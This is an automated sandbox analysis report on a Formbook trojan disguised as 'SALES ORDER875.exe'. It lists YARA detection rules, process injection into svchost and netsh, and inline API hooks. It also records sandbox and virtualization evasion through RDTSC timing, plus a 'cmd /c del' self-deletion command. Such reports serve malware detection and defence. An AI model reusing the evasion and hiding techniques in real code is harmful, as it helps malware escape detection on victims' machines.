Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: SALES ORDER875.exe PID: 6380, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 7032, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@10/2

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003F37B5 GetLastError,FormatMessageW,

0_2_003F37B5

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003E10BF AdjustTokenPrivileges,CloseHandle,		0_2_003E10BF
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_003E16C3

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_003F51CD

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_0040A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0040A67C

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_003F648E

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_003842A2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03

Source: C:\Users\user\Desktop\SALES ORDER875.exe

File created: C:\Users\user\AppData\Local\Temp\beeish

Source: SALES ORDER875.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: SALES ORDER875.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\SALES ORDER875.exe "C:\Users\user\Desktop\SALES ORDER875.exe"
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Source: SALES ORDER875.exe

Static file information: File size 1396736 > 1048576

Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SALES ORDER875.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SALES ORDER875.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: netsh.pdb source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp

Source: SALES ORDER875.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SALES ORDER875.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SALES ORDER875.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SALES ORDER875.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SALES ORDER875.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Modifies the prolog of user mode functions (user mode inline hooks)

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A0A76 push ecx; ret	0_2_003A0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320225F pushad ; ret	1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032027FA pushad ; ret	1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx	1_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320283D push eax; iretd	1_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320135E push eax; iretd	1_2_03201369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006BE46D push ebx; retf	1_2_006BE470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CE530 push edi; ret	1_2_006CE532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C285C push cs; retf	1_2_006C285F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CE9B2 push dword ptr [0ECCDC24h]; ret	1_2_006CEACE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CE992 push dword ptr [08CCB4BEh]; ret	1_2_006CE9AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C6A81 pushfd ; retf	1_2_006C6A82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C7008 pushfd ; retf	1_2_006C700F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C71EF push ds; iretd	1_2_006C71FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CD475 push eax; ret	1_2_006CD4C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CD4CB push eax; ret	1_2_006CD532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CD4C2 push eax; ret	1_2_006CD4C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CD52C push eax; ret	1_2_006CD532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C77BF push B417C20Bh; ret	1_2_006C77C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006C7ABC push edi; ret	1_2_006C7ABD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316EB1E push esp; retn 0000h	1_2_0316EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316EB02 push esp; retn 0000h	1_2_0316EB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E9B5 push esp; retn 0000h	1_2_0316EAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4CDB02 push esp; retn 0000h	3_2_0E4CDB03
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4CDB1E push esp; retn 0000h	3_2_0E4CDB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4CD9B5 push esp; retn 0000h	3_2_0E4CDAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E663B02 push esp; retn 0000h	3_2_0E663B03
Source: C:\Windows\explorer.exe	Code function: 3_2_0E663B1E push esp; retn 0000h	3_2_0E663B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E6639B5 push esp; retn 0000h	3_2_0E663AE7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DD225F pushad ; ret	4_2_00DD27F9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DD27FA pushad ; ret	4_2_00DD27F9

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0039F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0039F98E
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00411C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00411C41

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97003

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SALES ORDER875.exe	API/Special instruction interceptor: Address: 1A90F44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\netsh.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 6B9904 second address: 6B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 6B9B6E second address: 6B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 1D9B6E second address: 1D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0327096E rdtsc

1_2_0327096E

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4427	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5510	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Window / User API: threadDelayed 9838	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\SALES ORDER875.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\netsh.exe	API coverage: 1.5 %

Source: C:\Windows\explorer.exe TID: 4308	Thread sleep count: 4427 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4308	Thread sleep time: -8854000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4308	Thread sleep count: 5510 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4308	Thread sleep time: -11020000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2872	Thread sleep count: 134 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2872	Thread sleep time: -268000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2872	Thread sleep count: 9838 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2872	Thread sleep time: -19676000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F68EE FindFirstFileW,FindClose,	0_2_003F68EE
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_003F698F
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003ED076
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003ED3A9
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003F9642
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003F979D
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_003F9B2B
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003EDBBE
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_003F5C97

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: explorer.exe, 00000003.00000002.4137170074.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000003.00000002.4135604265.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000003.00000002.4137170074.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
